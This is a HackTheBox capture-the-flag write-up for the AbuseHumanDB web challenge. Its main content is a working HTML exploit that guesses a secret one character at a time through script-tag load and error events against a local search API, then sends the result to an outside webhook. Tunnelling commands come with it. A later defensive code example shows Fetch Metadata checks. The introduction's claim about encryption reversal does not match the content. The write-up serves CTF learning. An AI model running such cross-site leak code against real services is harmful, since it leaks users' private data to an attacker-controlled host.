HackTheBox AbuseHumanDB Writeup
Explore the basics of cybersecurity in the AbuseHumanDB Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
Use a webhook service like https://app.interactsh.com/, a VPS with a public port, or a tunneling service to expose the service.
index.html
<html>
  <head></head>
  <body>
    <script type="text/javascript">
      // Candidate characters tried at each position of the flag.
      var flag_charset = "}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!$()*,-[]_}";
      var flag = "HTB{";
      var charIndex = 0;

      const bruteForce = () => {
        // Load the search endpoint as a script; load vs. error is the oracle.
        var script = document.createElement("script");
        script.src = `//127.0.0.1:1337/api/entries/search?q=${flag}${flag_charset.charAt(charIndex)}`;
        document.body.appendChild(script);

        // Load succeeded: the guessed prefix matched, so keep the character.
        script.onload = () => {
          flag += flag_charset.charAt(charIndex);
          charIndex = 0;
          script.parentNode.removeChild(script);
          if (flag.slice(-1) != '}') {
            bruteForce();
          } else {
            // Flag is complete: report it to the webhook.
            var img = new Image();
            img.src = 'https://webhook.com?flag=' + flag; // <-- WebHookUrl
          }
        };

        // Load failed: no match for this guess, try the next character.
        script.onerror = () => {
          script.parentNode.removeChild(script);
          charIndex += 1;
          bruteForce();
        };
      };

      bruteForce();
    </script>
  </body>
</html>
python -m http.server
ssh -R 80:localhost:8000 localhost.run
Send the tunnel HTTP URL in the Abusive Content URL and check your webhook.
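Seen from the defender's side, the page above works because a cross-site script include can tell a successful search response from a failed one through onload and onerror. The following is an added example, not code from the challenge or from this writeup, showing two server-side checks that remove that signal; the server handler is an assumption (the writeup does not show it), and the function names, entries and sample requests are constructed.

```javascript
// Added example: server-side checks that remove the load/error oracle.
// Function names, the entry list and the sample requests are constructed.

// Fetch Metadata check: serve the API only to same-origin callers, direct
// user navigation ("none"), or clients that send no Fetch Metadata at all.
function isTrustedCaller(headers) {
  const site = headers["sec-fetch-site"];
  if (site === undefined) return true; // legacy browser or non-browser client
  return site === "same-origin" || site === "none";
}

// Same status and headers whether or not anything matched, so a cross-site
// <script> include sees one outcome for every guess. nosniff additionally
// makes browsers refuse to run a JSON response as a script.
function searchResponse(matches) {
  return {
    status: 200,
    headers: {
      "Content-Type": "application/json",
      "X-Content-Type-Options": "nosniff",
    },
    body: JSON.stringify({ results: matches }),
  };
}

function handleSearch(request, entries) {
  if (!isTrustedCaller(request.headers)) {
    // Rejected before the query runs: the response cannot depend on the data.
    return { status: 403, headers: {}, body: "" };
  }
  const q = request.query.q || "";
  return searchResponse(entries.filter((e) => e.includes(q)));
}

// Constructed sample data and requests.
const ENTRIES = ["public note", "SECRET{constructed_value}"];
const crossSiteScript = (q) => ({
  query: { q },
  headers: { "sec-fetch-site": "cross-site", "sec-fetch-dest": "script" },
});
const sameOrigin = (q) => ({
  query: { q },
  headers: { "sec-fetch-site": "same-origin", "sec-fetch-dest": "empty" },
});
```

Clients that send no Fetch Metadata headers pass the first check, which is why the uniform status in searchResponse is still needed as the second layer.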
Summary
The AbuseHumanDB Challenge on Hack The Box is an easy-level challenge where participants create a brute-force script in an HTML page to guess a flag, using a localhost.run tunnel to expose the server and capture the result via a webhook. This challenge offers a hands-on introduction to web vulnerabilities and flag retrieval techniques.